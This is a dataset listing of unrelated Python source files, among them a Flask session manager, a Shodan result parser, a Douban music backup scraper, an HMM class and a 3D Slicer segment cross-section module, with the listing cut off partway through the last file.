id
stringlengths 3
8
| content
stringlengths 100
981k
|
|---|---|
156348
|
from app.services.steps import *
from flask import g, current_app
class SessionManager():
"""
Session manager is responsible for taking in a registrant and current step and then determining which step needs to be performed next.
"""
# initialize these as None, override them with init method if valid.
next_step = None
prev_step = None
def __init__(self, registrant, current_step):
self.registrant = registrant
self.current_step = current_step
self._init_next_step()
self._init_prev_step()
def _init_next_step(self):
"""
If the current step has a next step set, initialize the next step class and save it to self.
"""
if self.current_step.next_step:
next_step = globals()[self.current_step.next_step]
self.next_step = next_step()
def _init_prev_step(self):
"""
If the current step has a previous step set, initialize the previous step class and save it to self.
"""
if self.current_step.prev_step:
prev_step = globals()[self.current_step.prev_step]
self.prev_step = prev_step()
def vr_completed(self):
if self.registrant.vr_completed_at and self.registrant.try_value('vr_form', False):
return True
return False
def ab_completed(self):
if self.registrant.ab_completed_at and self.registrant.try_value('ab_forms', False):
return True
return False
def get_locale_url(self, endpoint):
lang_code = g.get('lang_code', None)
if lang_code:
return '/' + lang_code + endpoint
else:
return endpoint
def get_redirect_url(self):
"""
Should always return a url path. Look at the current step and determine if the user needs to:
A: Move on to next step.
B: Move back to previous step.
C: Stay at current step.
"""
# For Step 0 when no previous step exists
if not self.prev_step:
if self.current_step.is_complete:
return self.get_locale_url(self.next_step.endpoint)
else:
return self.get_locale_url(self.current_step.endpoint)
# For the previous step iterate all of the requirements.
# If the requirement is not fulfilled return the previous step url
for req in self.prev_step.all_requirements():
# if a requirement is missing return the endpoint for the previous step
if not self.registrant.has_value_for_req(req):
return self.get_locale_url(self.prev_step.endpoint)
# if the step has been completed move on
if self.current_step.is_complete:
return self.get_locale_url(self.next_step.endpoint)
#default to returning current step
return self.get_locale_url(self.current_step.endpoint)
|
156361
|
import os
from typing import Any, Dict
name: str
env: Dict[Any, Any] = dict(os.environ)
def set_name(new_name: str) -> None:
global name
name = new_name
def set_env(env_to_set: dict) -> None:
global env
env.update(env_to_set)
def unset_env(env_to_unset: dict) -> None:
for k in env_to_unset:
if k not in env:
continue
del env[k]
def prepend_path(new_path: str) -> None:
global env
old_path = env['PATH']
env['PATH'] = f'{new_path}:{old_path}'
|
156411
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import six
import typing # NOQA: F401
from nixnet import _funcs
from nixnet import constants
class DbcAttributeCollection(collections.Mapping):
"""Collection for accessing DBC attributes."""
def __init__(self, handle):
# type: (int) -> None
self._handle = handle
# Here, we are caching the attribute names and enums to work around a driver issue.
# The issue results in an empty attribute value after intermixing calls to get attribute values and enums.
# We can avoid this issue if we get all attribute enums first, before getting any attribute values.
self._cache = dict(
(name, self._get_enums(name))
for name in self._get_names()
)
def __repr__(self):
return '{}(handle={})'.format(type(self).__name__, self._handle)
def __eq__(self, other):
if isinstance(other, self.__class__):
return self._handle == typing.cast(DbcAttributeCollection, other)._handle
else:
return NotImplemented
def __ne__(self, other):
result = self.__eq__(other)
if result is NotImplemented:
return result
else:
return not result
def __hash__(self):
return hash(self._handle)
def __len__(self):
return len(list(self.keys()))
def __iter__(self):
return self.keys()
def __getitem__(self, key):
# type: (typing.Text) -> typing.Tuple[typing.Text, bool]
"""Return the attribute value and whether it's the default value.
Args:
key(str): attribute name.
Returns:
tuple(str, bool): attribute value and whether it's the default value.
"""
if isinstance(key, six.string_types):
return self._get_value(key)
else:
raise TypeError(key)
def keys(self):
"""Return all attribute names in the collection.
Yields:
An iterator to all attribute names in the collection.
"""
for name in self._cache:
yield name
def values(self):
"""Return all attribute values in the collection.
Yields:
An iterator to all attribute values in the collection.
"""
for name in self._cache:
yield self._get_value(name)
def items(self):
"""Return all attribute names and values in the collection.
Yields:
An iterator to tuple pairs of attribute names and values in the collection.
"""
for name in self._cache:
yield name, self._get_value(name)
def _get_names(self):
# type: () -> typing.List[typing.Text]
mode = constants.GetDbcAttributeMode.ATTRIBUTE_LIST
attribute_size = _funcs.nxdb_get_dbc_attribute_size(self._handle, mode, '')
attribute_info = _funcs.nxdb_get_dbc_attribute(self._handle, mode, '', attribute_size)
name_string = attribute_info[0]
name_list = [
name
for name in name_string.split(',')
if name.strip()
]
return name_list
def _get_enums(self, name):
# type: (typing.Text) -> typing.List[typing.Text]
mode = constants.GetDbcAttributeMode.ENUMERATION_LIST
attribute_size = _funcs.nxdb_get_dbc_attribute_size(self._handle, mode, name)
attribute_info = _funcs.nxdb_get_dbc_attribute(self._handle, mode, name, attribute_size)
enum_string = attribute_info[0]
enum_list = [
enum
for enum in enum_string.split(',')
if enum.strip()
]
return enum_list
def _get_value(self, name):
# type: (typing.Text) -> typing.Tuple[typing.Text, bool]
if name not in self._cache:
raise KeyError('Attribute name %s not found in DBC attributes' % name)
mode = constants.GetDbcAttributeMode.ATTRIBUTE
attribute_size = _funcs.nxdb_get_dbc_attribute_size(self._handle, mode, name)
attribute_info = _funcs.nxdb_get_dbc_attribute(self._handle, mode, name, attribute_size)
enums = self._cache[name]
if not enums:
return attribute_info
# This attribute is an enum. Replace the enum index with the enum string.
index = int(attribute_info[0])
attribute_info = (enums[index], attribute_info[1])
return attribute_info
|
156413
|
from queue import Queue
class Gate():
def __init__(self, id_num, gate_type, input_ids, gate_queue=None, ready=False, const_input=None):
self.id_num = id_num
self.gate_type = gate_type
self.input_ids = input_ids
self.inputs = {}
for in_id in input_ids:
self.inputs[in_id] = ""
if self.gate_type == "INPUT":
self.inputs = {}
self.inputs[""] = ""
#self.gate_queue = gate_queue
self.ready = ready
self.complete = False
self.output = ""
self.const_input = const_input
def reset(self):
for in_id in self.inputs:
self.inputs[in_id] = ""
if self.gate_type == "INPUT":
self.inputs[""] = ""
self.ready = False
def add_input(self, in_id, in_value):
#if in_id == "":
# if type(in_value) == list:
# print("in_val: " + str(in_value[0].get_x()) + ", " + str(in_value[0].get_a()))
self.inputs[in_id] = in_value
#if self._is_ready():
# print("we ready")
# try:
# self.gate_queue.put(self)
# except:
# print("no gate queue for gate: " + self.id_num)
def get_inputs(self):
input_vals = []
for key in self.inputs:
if key != self.const_input:
input_vals.append(self.inputs[key])
return input_vals
def get_input_ids(self):
return self.input_ids
def get_type(self):
return self.gate_type
def get_id(self):
return self.id_num
def get_const_inputs(self):
input_vals = []
for key in self.inputs:
if key == self.const_input:
input_vals.append(self.inputs[key])
return input_vals
def is_ready(self):
ready = True
for in_id in self.inputs:
if self.inputs[in_id] == "":
ready = False
self.ready = ready
return self.ready
def is_complete(self):
return self.complete
def set_queue(self,q):
self.gate_queue = q
|
156439
|
import re
class HostDetailsWrapper:
"""Klasa pomocnicza - wrapper parsujacy dane z serwisu https://www.shodan.io/."""
def __init__(self, ip, host_details):
self.__ip = ip
self.__data = host_details
@property
def ip(self):
"""Atrybut zwracajacy adres ip hosta."""
return self.__ip
@property
def data(self):
return self.__data.get("data", [])
@property
def ports(self):
"""Atrybut klaasy zwracajacy informacje o portach."""
return self.__data.get("ports", [])
@property
def http(self):
"""Atrybut zwracajacy infromacje o portach gdize wykosztyswany jest protokół http"""
results = []
for i in self.data:
port = i.get("port", None)
http = i.get("http", {})
results.append({"port": port, "http": http})
return results
@property
def html(self):
"""Atrybut zwracający dane html."""
results = []
for i in self.http:
port = i.get("port", None)
html_data = i.get("http", {})
if port and html_data:
results.append({"port": port, "html": html_data})
return results
@property
def redirects(self):
"""Atrybut zwracajacy informacje o przekierowaniach do innych hostów"""
results = []
for i in self.html:
port = i.get("port", None)
html_data = i.get("html", None)
if html_data and port:
redirects = html_data.get("redirects", {})
if port and redirects:
for r in redirects:
redirect_data = r.get("data", "")
pattern = r'https:\/\/\d+\.\d+\.\d+\.\d+\/*\w+\/*' # TODO:
addresses = re.findall(pattern, redirect_data)
results.append({"port": port, "redirects": addresses})
return results
@property
def to_json(self):
response = {}
response.update({"ip": self.ip})
response.update({"ports": self.ports})
response.update({"html": self.html})
response.update({"redirects": self.redirects})
return response
|
156504
|
from bs4 import BeautifulSoup
import re
import time
import requests
headers0 = {'User-Agent':"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.62 Safari/537.36"}
def Musappend(Mdict,Items):
for it in Items:
title=it('a')[0].get_text(strip=True)
date=it(class_=re.compile('date'))[0].get_text(strip=True)
try:
stars=it(class_=re.compile('rat'))[0]['class'][0][6]
except:
stars='Nah'
try:
comment=it(class_=re.compile('comm'))[0].get_text(strip=True).replace('\n','-')
except:
comment='Nah'
try:
intro=it(class_='intro')[0].get_text(strip=True)
except:
intro='Nah'
Mdict[title]=[intro,date,stars,comment]
def HeardList(doubanid):
firstpage='https://music.douban.com/people/'+doubanid+'/collect?sort=time&start=0&filter=all&mode=list&tags_sort=count'
sess = requests.Session()
sess.headers.update(headers0)
request=sess.get(firstpage)
soup=BeautifulSoup(request.text,'html.parser')
items=soup.find_all(class_=re.compile('item'),id=re.compile('li'))
heard_dic={}
Musappend(Mdict=heard_dic,Items=items)
page=1
print(f'第{page}页',request.reason)
while 1:
time.sleep(1)
try:
NextPage=soup.find(class_='next').link.get('href')
except:
print('已到最终页')
break
else:
request=sess.get(NextPage)
soup=BeautifulSoup(request.text,'html.parser')
items=soup.find_all(class_=re.compile('item'),id=re.compile('li'))
Musappend(Mdict=heard_dic,Items=items)
page+=1
print(f'第{page}页',request.reason)
fw=open(doubanid+'_Heard_List.csv','w',encoding='utf-8_sig')
fw.write('专辑/单曲,简介,日期,评分,短评\n')
for title in heard_dic.keys():
fw.write(title.replace(',','、').replace(',','、')+','+heard_dic[title][0].replace(',','、').replace(',','、')+\
','+heard_dic[title][1]+','+heard_dic[title][2]+\
','+heard_dic[title][3].replace(',','、').replace(',','、')+'\n')
fw.close()
def WMusappend(Mdict,Items):
for it in Items:
title=it('a')[0].get_text(strip=True)
date=it(class_=re.compile('date'))[0].get_text(strip=True)
try:
comment=it(class_=re.compile('comm'))[0].get_text(strip=True).replace('\n','-')
except:
comment='Nah'
try:
intro=it(class_='intro')[0].get_text(strip=True)
except:
intro='Nah'
Mdict[title]=[intro,date,comment]
def WHeardList(doubanid):
firstpage='https://music.douban.com/people/'+doubanid+'/wish?sort=time&start=0&filter=all&mode=list&tags_sort=count'
sess = requests.Session()
sess.headers.update(headers0)
request=sess.get(firstpage)
soup=BeautifulSoup(request.text,'html.parser')
items=soup.find_all(class_=re.compile('item'),id=re.compile('li'))
whear_dic={}
WMusappend(Mdict=whear_dic,Items=items)
page=1
print(f'第{page}页',request.reason)
while 1:
time.sleep(1)
try:
NextPage=soup.find(class_='next').link.get('href')
except:
print('已到最终页')
break
else:
request=sess.get(NextPage)
soup=BeautifulSoup(request.text,'html.parser')
items=soup.find_all(class_=re.compile('item'),id=re.compile('li'))
Musappend(Mdict=whear_dic,Items=items)
page+=1
print(f'第{page}页',request.reason)
fw=open(doubanid+'_MusicWish_List.csv','w',encoding='utf-8_sig')
fw.write('专辑/单曲,简介,日期,留言\n')
for title in whear_dic.keys():
fw.write(title.replace(',','、').replace(',','、')+','+whear_dic[title][0].replace(',','、').replace(',','、')+\
','+whear_dic[title][1]+','+whear_dic[title][2].replace(',','、').replace(',','、')+'\n')
fw.close()
def main():
print('本程序备份用户的豆瓣音乐')
choice=input('请确定你要备份(yes/no):')
if choice == 'yes':
id=input('请输入你的豆瓣ID:')
print('开始备份听过列表')
HeardList(doubanid=id)
time.sleep(2)
print('开始备份想听列表')
WHeardList(doubanid=id)
print('备份已存在该exe所在目录下(如果没出错的话)')
print('问题反馈:<EMAIL> | https://github.com/JimSunJing/douban_clawer')
input('按任意键退出')
else:
print('bye')
main()
|
156506
|
from ._legendre import Legendre, Legendre_Normalized
from ._laguerre import Laguerre
from ._hermite import Hermite, Hermite2
from ._chebyshev import Chebyshev, Chebyshev2
from ._jacobi import Jacobi
__all__ = ['Legendre', 'Legendre_Normalized', 'Laguerre', 'Hermite', 'Hermite2', 'Chebyshev', 'Chebyshev2', 'Jacobi']
|
156510
|
import platform
if platform.system() == 'Darwin':
from mac_graph_traversal import *
else:
from graph_traversal import *
|
156671
|
import src.Exceptions as Exception
from src.Parser import Parser
from src.Interpreteur import Interpreteur
import time
import sys
import json
settings = json.load(open("settings.json", "r"))
ERROR_MESSAGE = settings["main"]["ERROR_MESSAGE"]
args = sys.argv
if len(sys.argv) < 2:
raise Exception.NotEnoughArguments(ERROR_MESSAGE)
debug = ("-d" in sys.argv, "-dp" in sys.argv or "-d" in sys.argv, "-di" in sys.argv or "-d" in sys.argv, "-o" in sys.argv)
arguments = False
liste_argv = []
for arg in sys.argv:
if arg == "-a":
arguments = True
elif arg == "-A":
arguments = False
elif arguments:
liste_argv.append(arg)
if "-p" in sys.argv:
temps = time.time()
print("Début de la compilation")
parser = Parser(debug[1], debug[3])
parser.getstr(sys.argv[1])
parser.generateinstructions()
if not debug : print(parser.instructions)
print(f"Compilation terminée en {time.time()-temps}s")
else:
temps = time.time()
print("Début de la compilation")
parser = Parser(debug[1], debug[3])
parser.getstr(sys.argv[1])
parser.generateinstructions()
print(f"Compilation terminée en {time.time()-temps}s")
print("Début de l'interpretation")
temps = time.time()
interpreteur = Interpreteur(debug[2], debug[3], liste_argv)
interpreteur.run(parser.instructions)
print(f"Interpretation terminée en {time.time()-temps}s")
|
156688
|
import argparse
import os
import sys
import torch
from torch import nn
import torchtext
from torchtext import data
from torchtext import datasets
from eval_args import get_arg_parser
from performance import size_metrics
import utils
from models.components.binarization import (
Binarize,
)
def main() -> None:
parser = get_arg_parser()
args = parser.parse_args()
device = "cuda" if torch.cuda.is_available() and args.cuda else "cpu"
print('using device {}'.format(device))
print('loading datasets...')
src = data.Field(include_lengths=True,
init_token='<sos>', eos_token='<eos>', batch_first=True, fix_length=200)
trg = data.Field(include_lengths=True,
init_token='<sos>', eos_token='<eos>', batch_first=True)
if args.dataset == 'WMT':
mt_train = datasets.TranslationDataset(
path=constants.WMT14_EN_FR_SMALL_TRAIN,
exts=('.en', '.fr'),
fields=(src, trg)
)
src_vocab, trg_vocab = utils.load_torchtext_wmt_small_vocab()
src.vocab = src_vocab
trg.vocab = trg_vocab
mt_valid = None
else:
if args.dataset == 'Multi30k':
mt_train, mt_valid, mt_test = datasets.Multi30k.splits(
exts=('.en', '.de'),
fields=(src, trg),
)
elif args.dataset == 'IWSLT':
mt_train, mt_valid, mt_test = datasets.IWSLT.splits(
exts=('.en', '.de'),
fields=(src, trg),
)
else:
raise Exception("Uknown dataset: {}".format(args.dataset))
print('loading vocabulary...')
# mt_dev shares the fields, so it shares their vocab objects
src.build_vocab(
mt_train,
min_freq=args.torchtext_unk,
max_size=args.torchtext_src_max_vocab,
)
trg.build_vocab(
mt_train,
max_size=args.torchtext_trg_max_vocab,
)
print('loaded vocabulary')
# determine the correct dataset to evaluate
eval_dataset = mt_train if args.eval_train else mt_valid
eval_dataset = mt_test if args.eval_test else eval_dataset
train_loader = data.BucketIterator(
dataset=eval_dataset,
batch_size=1,
sort_key=lambda x: len(x.src), # data.interleave_keys(len(x.src), len(x.trg)),
sort_within_batch=True,
device=device
)
print('model type: {}'.format(args.model_type))
model = utils.build_model(parser, src.vocab, trg.vocab)
if args.load_path is not None:
model.load_state_dict(torch.load(args.load_path))
model = model.eval()
if args.binarize:
print('binarizing model')
binarized_model = Binarize(model)
binarized_model.binarization()
print(model)
model_size = size_metrics.get_model_size(model)
print("64 bit float: {}".format(size_metrics.get_model_size(model, 64, args.binarize)))
print("32 bit float: {}".format(size_metrics.get_model_size(model, 32, args.binarize)))
print("16 bit float: {}".format(size_metrics.get_model_size(model, 16, args.binarize)))
if __name__ == "__main__":
main()
|
156709
|
import json
from pathlib import Path
import typer
def get_skill_config(name=None):
app_dir = Path(typer.get_app_dir('skills-cli', force_posix=True))
config_file = app_dir / 'config.json'
if not app_dir.exists():
typer.echo('Creating default configuration')
app_dir.mkdir(parents=True)
config = {}
else:
config = json.loads(config_file.read_text('utf-8')) or {}
remotes = config.get('remotes', {})
if not name:
return remotes
remote_config = remotes.get(name)
if not remote_config:
typer.secho(f'No configured remote with the name {name} found', color=typer.colors.RED, err=True)
raise typer.Exit(1)
return remote_config
|
156723
|
import unittest
from accelergy import helper_functions as hf
class TestHelperFunctions(unittest.TestCase):
def test_oneD_linear_interpolation(self):
""" linear interpolation on one hardware attribute """
# Rough estimation of simple ripple carry adder: E_adder = E_full_adder * bitwidth + E_misc
E_full_adder = 4
E_misc = 2
bitwidth_0 = 32
bitwidth_1 = 8
energy_0 = E_full_adder * bitwidth_0 + E_misc
energy_1 = E_full_adder * bitwidth_1 + E_misc
bitwidth_desired = 16
# expected output
energy_desired = E_full_adder * bitwidth_desired + E_misc
energy_interpolated = hf.oneD_linear_interpolation(bitwidth_desired,[{'x':bitwidth_0, 'y': energy_0},
{'x':bitwidth_1, 'y':energy_1}])
self.assertEqual(energy_interpolated, energy_desired)
def test_oneD_quad_interpolation(self):
""" quadratic interpolation on one hardware attribute """
# Rough estimation of simple array multiplier: E_mult = E_full_adder * bitwidth^2 + E_misc
E_full_adder = 4
E_misc = 2
bitwidth_0 = 32
bitwidth_1 = 8
energy_0 = E_full_adder * bitwidth_0**2 + E_misc
energy_1 = E_full_adder * bitwidth_1**2 + E_misc
bitwidth_desired = 16
# expected output
energy_desired = E_full_adder * bitwidth_desired**2 + E_misc
energy_interpolated = hf.oneD_quadratic_interpolation(bitwidth_desired,[{'x':bitwidth_0, 'y': energy_0},
{'x':bitwidth_1, 'y':energy_1}])
self.assertEqual(energy_interpolated, energy_desired)
if __name__ == '__main__':
unittest.main()
|
156734
|
n = int(input("Enter N: "))
l = []
for i in range(0 , n):
inp = int(input("Enter numbers: "))
l.append(inp)
l.sort()
a = 0
b = 0
for i in range(0 , n):
if i % 2 != 0:
a = a * 10 + l[i]
else:
b = b * 10 + l[i]
c = a + b
print(c)
|
156750
|
import numpy as np
class HMM:
def __init__(self, A=None, B=None, pi=None):
self.A = A
self.B = B
self.pi = pi
def forward(self, O, detailed=False):
alpha = self.pi*self.B[:, O[0]]
if detailed:
print("alpha: {}".format(alpha))
for t in range(1, len(O)):
alpha = np.squeeze(np.matmul(self.A.T, alpha[..., None]))*self.B[:, O[t]]
return np.sum(alpha)
def backward(self, O):
beta = np.ones(self.pi.shape)
for t in range(len(O)-1, 0, -1):
beta = np.squeeze(np.matmul(self.A, (self.B[:, O[t]]*beta)[..., None]))
return np.sum(self.pi*self.B[:, O[0]]*beta)
def Viterbi(self, O):
# initialization
delta = self.pi*self.B[:, O[0]]
psi = np.zeros((len(O), len(delta))) # t*i
for t in range(1, len(O)):
delta = np.max(delta[..., None]*self.A, axis=-1)*self.B[:, O[t]]
psi[t, :] = np.argmax(delta[..., None]*self.A, axis=-1)
I = []
i = np.argmax(delta)
I.append(i)
for t in range(len(O)-1, 0, -1):
i = psi[t, int(i)]
I.append(i)
I = [int(i) for i in I]
return np.max(delta), I[::-1]
|
156757
|
import os
import unittest
import logging
import vtk, qt, ctk, slicer
from slicer.ScriptedLoadableModule import *
from slicer.util import VTKObservationMixin
#
# SegmentCrossSectionArea
#
class SegmentCrossSectionArea(ScriptedLoadableModule):
"""Uses ScriptedLoadableModule base class, available at:
https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py
"""
def __init__(self, parent):
ScriptedLoadableModule.__init__(self, parent)
self.parent.title = "Segment Cross-Section Area"
self.parent.categories = ["Quantification"]
self.parent.dependencies = []
self.parent.contributors = ["<NAME> (AMNH)", "<NAME> (PerkLab)"]
self.parent.helpText = """This module computes cross-section of segments (created by Segment Editor module) and displays them in a plot.
Write to <a href="https://discourse.slicer.org">Slicer forum</a> if you need help using this module
"""
self.parent.acknowledgementText = """
This file was originally developed by <NAME> and <NAME>.
"""
#
# SegmentCrossSectionAreaWidget
#
class SegmentCrossSectionAreaWidget(ScriptedLoadableModuleWidget, VTKObservationMixin):
"""Uses ScriptedLoadableModuleWidget base class, available at:
https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py
"""
def __init__(self, parent=None):
"""
Called when the user opens the module the first time and the widget is initialized.
"""
ScriptedLoadableModuleWidget.__init__(self, parent)
VTKObservationMixin.__init__(self) # needed for parameter node observation
self.logic = None
self._parameterNode = None
def setup(self):
"""
Called when the user opens the module the first time and the widget is initialized.
"""
ScriptedLoadableModuleWidget.setup(self)
# Load widget from .ui file (created by Qt Designer)
uiWidget = slicer.util.loadUI(self.resourcePath('UI/SegmentCrossSectionArea.ui'))
self.layout.addWidget(uiWidget)
self.ui = slicer.util.childWidgetVariables(uiWidget)
# Set scene in MRML widgets. Make sure that in Qt designer
# "mrmlSceneChanged(vtkMRMLScene*)" signal in is connected to each MRML widget'rowCount.
# "setMRMLScene(vtkMRMLScene*)" slot.
uiWidget.setMRMLScene(slicer.mrmlScene)
# Create a new parameterNode
# This parameterNode stores all user choices in parameter values, node selections, etc.
# so that when the scene is saved and reloaded, these settings are restored.
self.logic = SegmentCrossSectionAreaLogic()
self.ui.parameterNodeSelector.addAttribute("vtkMRMLScriptedModuleNode", "ModuleName", self.moduleName)
self.setParameterNode(self.logic.getParameterNode())
# Connections
self.ui.parameterNodeSelector.connect('currentNodeChanged(vtkMRMLNode*)', self.setParameterNode)
self.ui.applyButton.connect('clicked(bool)', self.onApplyButton)
self.ui.showTablePushButton.connect('clicked(bool)', self.onShowTableButton)
self.ui.showChartPushButton.connect('clicked(bool)', self.onShowChartButton)
# These connections ensure that whenever user changes some settings on the GUI, that is saved in the MRML scene
# (in the selected parameter node).
self.ui.segmentationSelector.connect("currentNodeChanged(vtkMRMLNode*)", self.updateParameterNodeFromGUI)
self.ui.volumeSelector.connect("currentNodeChanged(vtkMRMLNode*)", self.updateParameterNodeFromGUI)
self.ui.axisSelectorBox.connect("currentIndexChanged(int)", self.updateParameterNodeFromGUI)
self.ui.tableSelector.connect("currentNodeChanged(vtkMRMLNode*)", self.updateParameterNodeFromGUI)
self.ui.chartSelector.connect("currentNodeChanged(vtkMRMLNode*)", self.updateParameterNodeFromGUI)
# Initial GUI update
self.updateGUIFromParameterNode()
def cleanup(self):
"""
Called when the application closes and the module widget is destroyed.
"""
self.removeObservers()
def setParameterNode(self, inputParameterNode):
"""
Adds observers to the selected parameter node. Observation is needed because when the
parameter node is changed then the GUI must be updated immediately.
"""
if inputParameterNode:
self.logic.setDefaultParameters(inputParameterNode)
# TODO: uncomment this when nodeFromIndex method will be available in Python
# # Select first segmentation node by default
# if not inputParameterNode.GetNodeReference("Segmentation"):
# segmentationNode = self.ui.segmentationSelector.nodeFromIndex(0)
# if segmentationNode:
# inputParameterNode.SetNodeReferenceID(segmentationNode.GetID())
# Set parameter node in the parameter node selector widget
wasBlocked = self.ui.parameterNodeSelector.blockSignals(True)
self.ui.parameterNodeSelector.setCurrentNode(inputParameterNode)
self.ui.parameterNodeSelector.blockSignals(wasBlocked)
if inputParameterNode == self._parameterNode:
# No change
return
# Unobserve previously selected parameter node and add an observer to the newly selected.
# Changes of parameter node are observed so that whenever parameters are changed by a script or any other module
# those are reflected immediately in the GUI.
if self._parameterNode is not None:
self.removeObserver(self._parameterNode, vtk.vtkCommand.ModifiedEvent, self.updateGUIFromParameterNode)
if inputParameterNode is not None:
self.addObserver(inputParameterNode, vtk.vtkCommand.ModifiedEvent, self.updateGUIFromParameterNode)
self._parameterNode = inputParameterNode
# Initial GUI update
self.updateGUIFromParameterNode()
def updateGUIFromParameterNode(self, caller=None, event=None):
"""
This method is called whenever parameter node is changed.
The module GUI is updated to show the current state of the parameter node.
"""
# Disable all sections if no parameter node is selected
self.ui.basicCollapsibleButton.enabled = self._parameterNode is not None
if self._parameterNode is None:
return
# Update each widget from parameter node
# Need to temporarily block signals to prevent infinite recursion (MRML node update triggers
# GUI update, which triggers MRML node update, which triggers GUI update, ...)
wasBlocked = self.ui.segmentationSelector.blockSignals(True)
self.ui.segmentationSelector.setCurrentNode(self._parameterNode.GetNodeReference("Segmentation"))
self.ui.segmentationSelector.blockSignals(wasBlocked)
wasBlocked = self.ui.volumeSelector.blockSignals(True)
self.ui.volumeSelector.setCurrentNode(self._parameterNode.GetNodeReference("Volume"))
self.ui.volumeSelector.blockSignals(wasBlocked)
wasBlocked = self.ui.axisSelectorBox.blockSignals(True)
self.ui.axisSelectorBox.currentText = self._parameterNode.GetParameter("Axis")
self.ui.axisSelectorBox.blockSignals(wasBlocked)
wasBlocked = self.ui.tableSelector.blockSignals(True)
self.ui.tableSelector.setCurrentNode(self._parameterNode.GetNodeReference("ResultsTable"))
self.ui.tableSelector.blockSignals(wasBlocked)
wasBlocked = self.ui.axisSelectorBox.blockSignals(True)
self.ui.chartSelector.setCurrentNode(self._parameterNode.GetNodeReference("ResultsChart"))
self.ui.axisSelectorBox.blockSignals(wasBlocked)
# Update buttons states and tooltips
if self._parameterNode.GetNodeReference("Segmentation"):
self.ui.applyButton.toolTip = "Compute cross sections"
self.ui.applyButton.enabled = True
else:
self.ui.applyButton.toolTip = "Select input segmentation node"
self.ui.applyButton.enabled = False
def updateParameterNodeFromGUI(self, caller=None, event=None):
"""
This method is called when the user makes any change in the GUI.
The changes are saved into the parameter node (so that they are restored when the scene is saved and loaded).
"""
if self._parameterNode is None:
return
self._parameterNode.SetNodeReferenceID("Segmentation", self.ui.segmentationSelector.currentNodeID)
self._parameterNode.SetNodeReferenceID("Volume", self.ui.volumeSelector.currentNodeID)
self._parameterNode.SetParameter("Axis", self.ui.axisSelectorBox.currentText)
self._parameterNode.SetNodeReferenceID("ResultsTable", self.ui.tableSelector.currentNodeID)
self._parameterNode.SetNodeReferenceID("ResultsChart", self.ui.chartSelector.currentNodeID)
def onApplyButton(self):
"""
Run processing when user clicks "Apply" button.
"""
try:
# Create nodes for results
tableNode = self.ui.tableSelector.currentNode()
if not tableNode:
tableNode = slicer.mrmlScene.AddNewNodeByClass("vtkMRMLTableNode", "Segment cross-section area table")
self.ui.tableSelector.setCurrentNode(tableNode)
plotChartNode = self.ui.chartSelector.currentNode()
if not plotChartNode:
plotChartNode = slicer.mrmlScene.AddNewNodeByClass("vtkMRMLPlotChartNode", "Segment cross-section area plot")
self.ui.chartSelector.setCurrentNode(plotChartNode)
self.logic.run(self.ui.segmentationSelector.currentNode(), self.ui.volumeSelector.currentNode(), self.ui.axisSelectorBox.currentText,
tableNode, plotChartNode)
self.logic.showChart(plotChartNode)
except Exception as e:
slicer.util.errorDisplay("Failed to compute results: "+str(e))
import traceback
traceback.print_exc()
def onShowTableButton(self):
tableNode = self.ui.tableSelector.currentNode()
if not tableNode:
self.onApplyButton()
tableNode = self.ui.tableSelector.currentNode()
if tableNode:
self.logic.showTable(tableNode)
def onShowChartButton(self):
plotChartNode = self.ui.chartSelector.currentNode()
if not plotChartNode:
self.onApplyButton()
plotChartNode = self.ui.chartSelector.currentNode()
if plotChartNode:
self.logic.showChart(plotChartNode)
#
# SegmentCrossSectionAreaLogic
#
class SegmentCrossSectionAreaLogic(ScriptedLoadableModuleLogic):
"""This class should implement all the actual
computation done by your module. The interface
should be such that other python code can import
this class and make use of the functionality without
requiring an instance of the Widget.
Uses ScriptedLoadableModuleLogic base class, available at:
https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py
"""
def setDefaultParameters(self, parameterNode):
"""
Initialize parameter node with default settings.
"""
if not parameterNode.GetParameter("Axis"):
parameterNode.SetParameter("Axis", "slice")
def run(self, segmentationNode, volumeNode, axis, tableNode, plotChartNode):
"""
Run the processing algorithm.
Can be used without GUI widget.
:param segmentationNode: cross section area will be computed on this
:param volumeNode: optional reference volume (to determine slice positions and directions)
:param axis: axis index to compute cross section areas along
:param tableNode: result table node
:param plotChartNode: result chart node
"""
import numpy as np
logging.info('Processing started')
if not segmentationNode:
raise ValueError("Segmentation node is invalid")
# Get visible segment ID list.
# Get segment ID list
visibleSegmentIds = vtk.vtkStringArray()
segmentationNode.GetDisplayNode().GetVisibleSegmentIDs(visibleSegmentIds)
if visibleSegmentIds.GetNumberOfValues() == 0:
raise ValueError("SliceAreaPlot will not return any results: there are no visible segments")
if axis=="row":
axisIndex = 0
elif axis=="column":
axisIndex = 1
elif axis=="slice":
axisIndex = 2
else:
raise ValueError("Invalid axis name: "+axis)
#
# Make a table and set the first column as the slice number. This is used
# as the X axis for plots.
#
tableNode.RemoveAllColumns()
table = tableNode.GetTable()
# Make a plot chart node. Plot series nodes will be added to this in the
# loop below that iterates over each segment.
plotChartNode.SetTitle('Segment cross-section area ('+axis+')')
plotChartNode.SetXAxisTitle(axis +" index")
plotChartNode.SetYAxisTitle('Area in mm^2') # TODO: use length unit
#
# For each segment, get the area and put it in the table in a new column.
#
try:
# Create temporary volume node
tempSegmentLabelmapVolumeNode = slicer.mrmlScene.AddNewNodeByClass('vtkMRMLLabelMapVolumeNode', "SegmentCrossSectionAreaTemp")
for segmentIndex in range(visibleSegmentIds.GetNumberOfValues()):
segmentID = visibleSegmentIds.GetValue(segmentIndex)
segmentList = vtk.vtkStringArray()
segmentList.InsertNextValue(segmentID)
if not slicer.modules.segmentations.logic().ExportSegmentsToLabelmapNode(segmentationNode, segmentList, tempSegmentLabelmapVolumeNode, volumeNode):
continue
if segmentIndex == 0:
volumeExtents = tempSegmentLabelmapVolumeNode.GetImageData().GetExtent()
numSlices = volumeExtents[axisIndex*2+1] - volumeExtents[axisIndex*2] + 1
startPosition_Ijk = [
(volumeExtents[0]+volumeExtents[1])/2.0 if axisIndex!=0 else volumeExtents[0],
(volumeExtents[2]+volumeExtents[3])/2.0 if axisIndex!=1 else volumeExtents[2],
(volumeExtents[4]+volumeExtents[5])/2.0 if axisIndex!=2 else volumeExtents[4],
1
]
endPosition_Ijk = [
(volumeExtents[0]+volumeExtents[1])/2.0 if axisIndex!=0 else volumeExtents[1],
